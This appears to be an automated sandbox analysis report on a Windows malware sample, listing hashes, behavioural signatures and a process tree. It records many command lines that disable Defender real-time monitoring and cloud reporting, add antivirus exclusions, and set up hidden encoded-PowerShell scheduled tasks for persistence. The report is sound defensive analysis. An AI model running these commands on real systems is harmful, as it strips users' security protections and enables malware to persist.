Analysis
- max time kernel: 145s
- max time network: 140s
- platform: windows7_x64
- resource: win7-20231025-en
- resource tags: arch:x64, arch:x86, image:win7-20231025-en, locale:en-us, os:windows7-x64, system
- submitted: 07-12-2023 19:54

Static task: static1
Behavioral task: behavioral1
- Sample: file.exe
- Resource: win7-20231025-en
General
- Target: file.exe
- Size: 7.3MB
- MD5: fca38988f95f893355d9f020a1f71ee3
- SHA1: c3b9647467c9b434ba6a796c05f27a350c6fd8c8
- SHA256: aae089ffc7f6e35506106b454fd2edfc4941467e06f76d173f9cbd9e02110031
- SHA512: 266566c7ec8057122c5ca08dc00c16c5c9e73ea552c4c3fbc5a41c56e2fb2852b8dbc1dd2161980609d750cc0d120f2d074445585cbe5bf33c6beb2ed5bfb36c
- SSDEEP: 196608:91OUHIbPGg9PaDD9zATbAXqXWAXz2v/tBDPRb7S:3OUIb+Iiwk6mPv/tVRq
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings (4 IoCs)
Processes: reg.exe, reg.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
Windows security bypass (40 IoCs)
Processes: 20 instances of reg.exe; each one creates the exclusion key and sets one path value. Writes issued with /reg:32 from the 32-bit reg.exe land under Wow6432Node, writes issued with /reg:64 land in the native key.
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe)
Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
Processes: Install.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)
Executes dropped EXE (3 IoCs)
Processes: Install.exe, Install.exe, DzWmOru.exe
- PID 1940: Install.exe
- PID 2328: Install.exe
- PID 1328: DzWmOru.exe
Loads dropped DLL (8 IoCs)
Processes: file.exe, Install.exe, Install.exe
- PID 2472: file.exe (1 load)
- PID 1940: Install.exe (4 loads)
- PID 2328: Install.exe (3 loads)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in System32 directory (8 IoCs)
Processes: powershell.EXE, powershell.EXE, Install.exe, powershell.EXE, DzWmOru.exe, powershell.EXE
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- File created: C:\Windows\system32\GroupPolicy\gpt.ini (Install.exe)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (DzWmOru.exe)
- File opened for modification: C:\Windows\system32\GroupPolicy\gpt.ini (DzWmOru.exe)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- File opened for modification: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (DzWmOru.exe)
Drops file in Windows directory (1 IoC)
Processes: conhost.exe
- File created: C:\Windows\Tasks\bQrKcOXclPyMmQgfTY.job (conhost.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTP, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (5 instances)
- PID 1972: schtasks.exe
- PID 2208: schtasks.exe
- PID 1660: schtasks.exe
- PID 2308: schtasks.exe
- PID 1944: schtasks.exe
Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes: Install.exe
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
Modifies data under HKEY_USERS (9 IoCs)
Processes: wscript.exe
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings (wscript.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (wscript.exe)
Suspicious behavior: EnumeratesProcesses (12 IoCs)
Processes: powershell.EXE (4 instances)
- PID 2940: powershell.EXE (3 events)
- PID 2096: powershell.EXE (3 events)
- PID 1012: powershell.EXE (3 events)
- PID 1640: powershell.EXE (3 events)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: powershell.EXE (4 instances)
- Token: SeDebugPrivilege, PID 2940 (powershell.EXE)
- Token: SeDebugPrivilege, PID 2096 (powershell.EXE)
- Token: SeDebugPrivilege, PID 1012 (powershell.EXE)
- Token: SeDebugPrivilege, PID 1640 (powershell.EXE)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: file.exe, Install.exe, Install.exe, forfiles.exe, reg.exe, cmd.exe, cmd.exe
- PID 2472 (file.exe) wrote to memory of PID 1940 (Install.exe): 7 events
- PID 1940 (Install.exe) wrote to memory of PID 2328 (Install.exe): 7 events
- PID 2328 (Install.exe) wrote to memory of PID 2960 (forfiles.exe): 7 events
- PID 2328 (Install.exe) wrote to memory of PID 2776 (forfiles.exe): 7 events
- PID 2776 (forfiles.exe) wrote to memory of PID 2640 (cmd.exe): 7 events
- PID 2960 (reg.exe) wrote to memory of PID 2528 (cmd.exe): 7 events
- PID 2640 (cmd.exe) wrote to memory of PID 2544 (reg.exe): 7 events
- PID 2528 (cmd.exe) wrote to memory of PID 2524 (reg.exe): 7 events
- PID 2528 (cmd.exe) wrote to memory of PID 2560 (reg.exe): 7 events
- PID 2640 (cmd.exe) wrote to memory of PID 2592 (reg.exe): 1 event
Note on the source name for PID 2960: the process tree below shows that PID first as forfiles.exe (the parent of cmd.exe 2528) and later reused by a reg.exe instance, so the "reg.exe" label here reflects PID reuse, not reg.exe injecting into cmd.exe.
Processes
Tree depth is shown in brackets; each entry gives the image path, the command line, the PID and the signatures that process triggered.

[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    PID: 2472
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7zS3063.tmp\Install.exe
      command line: .\Install.exe
      PID: 1940
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS337F.tmp\Install.exe
        command line: .\Install.exe /bAdPdidLC "525403" /S
        PID: 2328
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in System32 directory
        - Enumerates system info in registry
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\forfiles.exe
          command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          PID: 2960
        [5] C:\Windows\SysWOW64\cmd.exe
            command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            PID: 2528
            - Suspicious use of WriteProcessMemory
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              PID: 2560
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              PID: 2524
      [4] C:\Windows\SysWOW64\forfiles.exe
          command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          PID: 2776
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            PID: 2640
            - Suspicious use of WriteProcessMemory
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              PID: 2544
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              PID: 2592
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /CREATE /TN "gTzSIkRJV" /SC once /ST 10:35:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          (the Base64 is UTF-16LE for: start-process -WindowStyle Hidden gpupdate.exe /force; the same payload is reused by every -EncodedCommand in this tree)
          PID: 1972
          - Creates scheduled task(s)
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /run /I /tn "gTzSIkRJV"
          PID: 2876
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /DELETE /F /TN "gTzSIkRJV"
          PID: 2272
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 19:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe\" BX /MIsite_idEEz 525403 /S" /V1 /F
          PID: 2208
          - Creates scheduled task(s)
[1] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {C59F5D66-4F4A-4761-9BF5-076C7891D40D} S-1-5-21-1861898231-3446828954-4278112889-1000:PTZSFKIF\Admin:Interactive:[1]
    PID: 1952
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      PID: 2940
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
        PID: 2840
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      PID: 2096
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
        PID: 2996
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      PID: 1012
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
        PID: 2460
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      PID: 1640
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
        PID: 2968
[1] C:\Windows\system32\gpscript.exe
    command line: gpscript.exe /RefreshSystemParam
    PID: 2832
[1] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {6DCD38A8-46D1-4E22-9A32-2D3B55ED72CA} S-1-5-18:NT AUTHORITY\System:Service:
    PID: 1964
  [2] C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe
      command line: C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe BX /MIsite_idEEz 525403 /S
      PID: 1328
      - Executes dropped EXE
      - Drops file in System32 directory
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "gujyilwym" /SC once /ST 12:52:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        PID: 1660
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "gujyilwym"
        PID: 2920
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /DELETE /F /TN "gujyilwym"
        PID: 2384
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        PID: 1604
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          PID: 1624
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "gNHXaQpcn" /SC once /ST 13:11:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        PID: 2308
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        PID: 1304
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "gNHXaQpcn"
        PID: 696
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /DELETE /F /TN "gNHXaQpcn"
        PID: 1608
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
        PID: 2232
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
          PID: 820
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C copy nul "C:\Windows\Temp\szdKxxrFMiVXCdXj\RVlUOiQv\jeLVBvLoNRhGIpTH.wsf"
        PID: 2552
    [3] C:\Windows\SysWOW64\wscript.exe
        command line: wscript "C:\Windows\Temp\szdKxxrFMiVXCdXj\RVlUOiQv\jeLVBvLoNRhGIpTH.wsf"
        PID: 2576
        - Modifies data under HKEY_USERS
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:32
          PID: 2904
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:64
          PID: 2960
          - Windows security bypass
          - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:64
          PID: 3064
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:32
          PID: 3060
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:32
          PID: 296
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
          PID: 984
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:64
          PID: 1604
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:64
          PID: 1924
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:32
          PID: 1740
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          PID: 980
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          PID: 2156
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:64
          PID: 1688
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:64
          PID: 700
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:32
          PID: 1876
      [4] C:\Windows\SysWOW64\reg.exe
